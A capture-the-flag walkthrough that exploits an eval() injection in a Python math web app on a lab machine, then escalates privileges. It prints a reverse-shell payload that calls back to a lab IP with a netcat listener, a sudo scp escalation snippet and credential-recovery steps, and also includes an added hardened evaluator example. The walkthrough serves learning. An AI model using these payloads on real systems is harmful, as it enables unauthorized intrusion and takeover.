Now let’s save all the required values and wordlists as constants on the shell. This speeds up your process and avoids confusion when typing complex commands.
You can also include this in a general .sh file so you can use it in other scenarios. Let us show you how to do it.
Create a new .sh file and add the commands to it.
Make it executable: chmod +x general_constant_operation.sh
Then run it: ./general_constant_operation.sh
Or just set the constants manually.
Now, using nmap, we need to know the enemy better and discover where we can infiltrate: nmap -sV -sC -oN nmap_result.txt -A -T4 --script=vuln $target_ip
Be patient. It will bring us good information.
SSH (22) is open and there is a list of vulnerabilities we can try on the current version.
We discovered an interesting application running on port 5000. Go there.
We have an application that performs mathematical operations. We can use SQLi methods using the input sections here. This is the first thing that comes to mind.
But it is always useful to examine the page a little more.
As you can see, we can download the source code of the current application. In such cases, you should always have the source code at hand.
Just download.
Examine the inside.
We now have 4 separate Python files, so we know the language the application is written in.
Check out “app.py”. This is the main file from which the other modules are called.
There is an “eval()” call in the code. This can be used for command injection. You can review it in detail here: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes
There are some examples under the title “Eval-ing python code”.
We should try this attack for “bisection” operation in practice.
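As an added example, not the challenge’s own app.py (whose source is not reproduced here): a reconstruction of the eval() pattern next to a hardened evaluator that only accepts arithmetic, with a bisection routine built on it. The expression syntax, the variable name x and the size limits are assumptions.

```python
import ast
import operator

# Hypothetical reconstruction of the pattern the page describes: user input goes to eval().
def unsafe_eval_expr(expr: str, x: float):
    return eval(expr, {"x": x})  # DO NOT USE: untrusted input becomes code

# Hardened replacement: parse with ast and walk the tree, accepting only numeric
# literals, the variable x, binary arithmetic and unary sign; all else raises ValueError.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
            ast.Div: operator.truediv, ast.Pow: operator.pow, ast.Mod: operator.mod}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}

def _eval_node(node, x):
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.Name) and node.id == "x":
        return x
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left, x), _eval_node(node.right, x)
        if isinstance(node.op, ast.Pow) and abs(right) > 64:
            raise ValueError("exponent too large")  # bound CPU/memory use
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand, x))
    # Calls, attributes, subscripts, strings and other names are rejected here.
    raise ValueError(f"disallowed element: {type(node).__name__}")

def safe_eval_expr(expr: str, x: float) -> float:
    if len(expr) > 200:
        raise ValueError("expression too long")  # also keeps recursion shallow
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise ValueError("invalid expression") from exc
    return float(_eval_node(tree.body, x))

def is_rejected(expr: str) -> bool:
    try:
        safe_eval_expr(expr, 1.0)
    except ValueError:
        return True
    return False

def bisection(expr: str, lo: float, hi: float, tol: float = 1e-9) -> float:
    """Root of f(x) = expr on [lo, hi]; f(lo) and f(hi) must differ in sign."""
    f_lo = safe_eval_expr(expr, lo)
    while hi - lo > tol:
        mid = (lo + hi) / 2
        f_mid = safe_eval_expr(expr, mid)
        if f_lo * f_mid <= 0:
            hi = mid
        else:
            lo, f_lo = mid, f_mid
    return (lo + hi) / 2
```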
Turn on Burp tool.
Change your browser settings.
Then connect to proxy.
Now that the proxy is connected, let’s look at the inputs of the operation we will attack. Intercept should be ON.
We can see the parameters that will be sent in the body of the POST request.
Let’s add the following malicious entry:
__import__('os').system("bash -c 'bash -i >& /dev/tcp/10.10.83.114/4444 0>&1'")
Before sending this, start a listener on your machine on the port you specified: nc -nlvp 4444
Forward it now.
If that doesn’t work, just submit it directly as input.
We are inside. Try some commands.
Check sudo privilege: sudo -l
Stabilize the reverse shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Then: export TERM=xterm
Escalate it if possible:
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod 777 "$TF"
sudo scp -S $TF x y:
This is not possible in this scenario, since we do not have the sudo password.
Let’s examine the files for evidence.
Let’s use the information here and perform an operation on the .py file that we can run: sudo -u gordon /usr/bin/python3 /opt/encrypt.py
Let’s use a random value to explore the XOR operation and then perform some operations on https://gchq.github.io/CyberChef/.
Now we have worked out the logic.
Now let’s try the same operation again with the value given to us.
We have everything. Escalate it.
Time to connect via SSH: ssh gordon@10.10.94.68
Try some commands.
We now have control of the machine in front of us.
Let’s look for any files that the “root” user owns but that also belong to the group “gordon”: find / -user root -group gordon -ls 2>/dev/null
Let’s dive into “backups”.
Let’s go into “reports” and get the authorization.
Perform the following methods in order.
We won.